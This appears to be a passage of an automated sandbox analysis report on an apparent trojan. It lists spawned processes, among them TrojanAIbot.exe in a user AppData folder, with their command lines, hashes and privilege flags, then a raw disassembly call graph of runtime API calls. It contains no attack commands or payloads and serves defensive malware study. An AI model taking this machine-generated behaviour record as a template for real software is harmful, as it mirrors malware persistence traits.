                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:53
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:timeout 6
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x6e0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:25'088 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:54
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xa70000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:231'936 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:54
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'242'624 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:7FF4977D46F3519BDDBBC7F980695D96
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:55
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6ef0c0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:57
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:2'354'176 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:AB5074630045AB26B71225715D67B7F6
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:58
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'356'800 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:7BBB6DB310D239DA8D65A687C939EAA5
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:59
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'278'464 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:B997E00A6861615E066CA0DA6FBA54A6
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:01
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'235'968 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:A1956F0F6BD74F7EF4C9CB4215174395
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:02
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'150'976 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:5A2927C6AC02ED9AAA0EEAD979B6927B
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:04
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'141'248 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:9A657A7F089C2AF389D25AD39498587D
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:05
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'846'784 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:49C1710C0BFB918B23DDE91B5109B005
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:06
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x580000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:231'936 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:06
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'146'880 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:579893F6B0B6C9ED87C94C25F4EDC7E0
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:07
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'455'616 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:5C7A9FB953BDB52056F816EFDBDB2113
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:08
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'511'424 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:E3FDD9F1AB11BF5FA018CD72E8AF127F
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:09
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\TieringEngineService.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\TieringEngineService.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'455'616 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:34A80D2A50958A3B610C920E02938885
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:10
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\AgentService.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\AgentService.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'801'216 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:9543A0B25A6C0199CB8A7CB3D1E158F8
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:12
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'303'552 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:2DBE73EC9F3D022F74934054582A8EBA
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:13
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbengine.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:2'164'736 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:C0B66BD1EE3D66E90E2046376956878E
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                Execution Coverage:3.3%
                                                                                                                                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                                                                                                                                                                                                                                                                                                                Signature Coverage:3.1%
                                                                                                                                                                                                                                                                                                                                                                                                                Total number of Nodes:1708
                                                                                                                                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:51
                                                                                                                                                                                                                                                                                                                                                                                                                execution_graph 84723 467046 84724 46705d 84723->84724 84734 467136 84723->84734 84725 4671a0 84724->84725 84726 46710d 84724->84726 84727 467199 84724->84727 84736 46706e 84724->84736 84729 41171a 75 API calls 84725->84729 84730 41171a 75 API calls 84726->84730 84757 40e380 VariantClear ctype 84727->84757 84742 4670f3 _memcpy_s 84729->84742 84730->84742 84731 4670d2 84733 41171a 75 API calls 84731->84733 84732 41171a 75 API calls 84732->84734 84735 4670d8 84733->84735 84755 443466 75 API calls 84735->84755 84741 4670a9 ctype 84736->84741 84743 41171a 84736->84743 84739 4670e8 84756 45efe7 77 API calls ctype 84739->84756 84741->84725 84741->84731 84741->84742 84742->84732 84745 411724 84743->84745 84746 41173e 84745->84746 84750 411740 std::bad_alloc::bad_alloc 84745->84750 84758 4138ba 84745->84758 84776 411afc 6 API calls __decode_pointer 84745->84776 84746->84741 84748 411766 84780 4116fd 67 API calls std::exception::exception 84748->84780 84750->84748 84777 411421 84750->84777 84751 411770 84781 41805b RaiseException 84751->84781 84754 41177e 84755->84739 84756->84742 84757->84725 84759 41396d 84758->84759 84764 4138cc 84758->84764 84789 411afc 6 API calls __decode_pointer 84759->84789 84761 413973 84790 417f23 67 API calls __getptd_noexit 84761->84790 84765 413965 84764->84765 84768 413929 RtlAllocateHeap 84764->84768 84769 4138dd 84764->84769 84771 413959 84764->84771 84774 41395e 84764->84774 84785 41386b 67 API calls 4 library calls 84764->84785 84786 411afc 6 API calls __decode_pointer 84764->84786 84765->84745 84768->84764 84769->84764 84782 418252 67 API calls 2 library calls 84769->84782 84783 4180a7 67 API calls 7 library calls 84769->84783 84784 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84769->84784 84787 417f23 67 API calls __getptd_noexit 84771->84787 84788 417f23 67 API calls __getptd_noexit 84774->84788 84776->84745 84791 4113e5 84777->84791 84779 41142e 84779->84748 84780->84751 84781->84754 84782->84769 84783->84769 84785->84764 84786->84764 84787->84774 84788->84765 84789->84761 84790->84765 84792 4113f1 __sopen_helper 84791->84792 84799 41181b 84792->84799 84798 411412 __sopen_helper 84798->84779 84825 418407 84799->84825 84801 4113f6 84802 4112fa 84801->84802 84890 4169e9 TlsGetValue 84802->84890 84805 4169e9 __decode_pointer 6 API calls 84806 41131e 84805->84806 84816 4113a1 84806->84816 84900 4170e7 68 API calls 5 library calls 84806->84900 84808 41133c 84811 411357 84808->84811 84812 411366 84808->84812 84821 411388 84808->84821 84809 41696e __encode_pointer 6 API calls 84810 411396 84809->84810 84813 41696e __encode_pointer 6 API calls 84810->84813 84901 417047 73 API calls _realloc 84811->84901 84815 411360 84812->84815 84812->84816 84813->84816 84815->84812 84818 41137c 84815->84818 84902 417047 73 API calls _realloc 84815->84902 84822 41141b 84816->84822 84903 41696e TlsGetValue 84818->84903 84819 411376 84819->84816 84819->84818 84821->84809 84915 411824 84822->84915 84826 41841c 84825->84826 84827 41842f EnterCriticalSection 84825->84827 84832 418344 84826->84832 84827->84801 84829 418422 84829->84827 84860 4117af 67 API calls 3 library calls 84829->84860 84831 41842e 84831->84827 84833 418350 __sopen_helper 84832->84833 84834 418360 84833->84834 84835 418378 84833->84835 84861 418252 67 API calls 2 library calls 84834->84861 84844 418386 __sopen_helper 84835->84844 84864 416fb6 84835->84864 84838 418365 84862 4180a7 67 API calls 7 library calls 84838->84862 84841 41836c 84863 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84841->84863 84842 4183a7 84847 418407 __lock 67 API calls 84842->84847 84843 418398 84870 417f23 67 API calls __getptd_noexit 84843->84870 84844->84829 84849 4183ae 84847->84849 84850 4183e2 84849->84850 84851 4183b6 84849->84851 84852 413a88 __fclose_nolock 67 API calls 84850->84852 84871 4189e6 InitializeCriticalSectionAndSpinCount __sopen_helper 84851->84871 84855 4183d3 84852->84855 84854 4183c1 84854->84855 84872 413a88 84854->84872 84886 4183fe LeaveCriticalSection _doexit 84855->84886 84858 4183cd 84885 417f23 67 API calls __getptd_noexit 84858->84885 84860->84831 84861->84838 84862->84841 84867 416fbf 84864->84867 84865 4138ba _malloc 66 API calls 84865->84867 84866 416ff5 84866->84842 84866->84843 84867->84865 84867->84866 84868 416fd6 Sleep 84867->84868 84869 416feb 84868->84869 84869->84866 84869->84867 84870->84844 84871->84854 84874 413a94 __sopen_helper 84872->84874 84873 413b0d _realloc __sopen_helper 84873->84858 84874->84873 84875 413ad3 84874->84875 84877 418407 __lock 65 API calls 84874->84877 84875->84873 84876 413ae8 RtlFreeHeap 84875->84876 84876->84873 84878 413afa 84876->84878 84881 413aab ___sbh_find_block 84877->84881 84889 417f23 67 API calls __getptd_noexit 84878->84889 84880 413aff GetLastError 84880->84873 84884 413ac5 84881->84884 84887 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __shift 84881->84887 84888 413ade LeaveCriticalSection _doexit 84884->84888 84885->84855 84886->84844 84887->84884 84888->84875 84889->84880 84891 416a01 84890->84891 84892 416a22 GetModuleHandleW 84890->84892 84891->84892 84893 416a0b TlsGetValue 84891->84893 84894 416a32 84892->84894 84895 416a3d GetProcAddress 84892->84895 84897 416a16 84893->84897 84913 41177f Sleep GetModuleHandleW 84894->84913 84899 41130e 84895->84899 84897->84892 84897->84899 84898 416a38 84898->84895 84898->84899 84899->84805 84900->84808 84901->84815 84902->84819 84904 4169a7 GetModuleHandleW 84903->84904 84905 416986 84903->84905 84906 4169c2 GetProcAddress 84904->84906 84907 4169b7 84904->84907 84905->84904 84908 416990 TlsGetValue 84905->84908 84910 41699f 84906->84910 84914 41177f Sleep GetModuleHandleW 84907->84914 84911 41699b 84908->84911 84910->84821 84911->84904 84911->84910 84912 4169bd 84912->84906 84912->84910 84913->84898 84914->84912 84918 41832d LeaveCriticalSection 84915->84918 84917 411420 84917->84798 84918->84917 84919 444343 84922 444326 84919->84922 84921 44434e WriteFile 84923 444340 84922->84923 84924 4442c7 84922->84924 84923->84921 84929 40e190 SetFilePointerEx 84924->84929 84926 4442e0 SetFilePointerEx 84930 40e190 SetFilePointerEx 84926->84930 84928 4442ff 84928->84921 84929->84926 84930->84928 84931 46d22f 84934 46d098 84931->84934 84933 46d241 84935 46d0b5 84934->84935 84936 46d115 84935->84936 84937 46d0b9 84935->84937 84993 45c216 78 API calls 84936->84993 84939 41171a 75 API calls 84937->84939 84941 46d0c0 84939->84941 84940 46d126 84943 46d0f8 84940->84943 84949 46d142 84940->84949 84942 46d0cc 84941->84942 84982 40d940 76 API calls 84941->84982 84983 453063 84942->84983 84989 4092c0 84943->84989 84947 46d0fd 84947->84933 84950 46d1c8 84949->84950 84953 46d158 84949->84953 85003 4676a3 78 API calls 84950->85003 84956 453063 111 API calls 84953->84956 84954 46d0ea 84954->84949 84957 46d0ee 84954->84957 84955 46d1ce 85004 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 84955->85004 84965 46d15e 84956->84965 84957->84943 84988 44ade5 CloseHandle ctype 84957->84988 84958 46d18d 84994 467fce 82 API calls 84958->84994 84962 46d196 84995 4013a0 84962->84995 84963 46d1e7 84967 4092c0 VariantClear 84963->84967 84976 46d194 84963->84976 84965->84958 84965->84962 84967->84976 84969 46d1ac 85001 40d3b0 75 API calls 2 library calls 84969->85001 84971 46d224 84971->84933 84972 46d1b8 85002 467fce 82 API calls 84972->85002 84975 46d216 85005 44ade5 CloseHandle ctype 84975->85005 84976->84971 84978 40d900 84976->84978 84979 40d917 84978->84979 84980 40d909 84978->84980 84979->84980 84981 40d91c CloseHandle 84979->84981 84980->84975 84981->84975 84982->84942 84984 45306e 84983->84984 84985 45307a 84983->84985 84984->84985 85006 452e2a 111 API calls 5 library calls 84984->85006 84987 40dfa0 83 API calls 84985->84987 84987->84954 84988->84943 84990 4092c8 ctype 84989->84990 84991 429db0 VariantClear 84990->84991 84992 4092d5 ctype 84990->84992 84991->84992 84992->84947 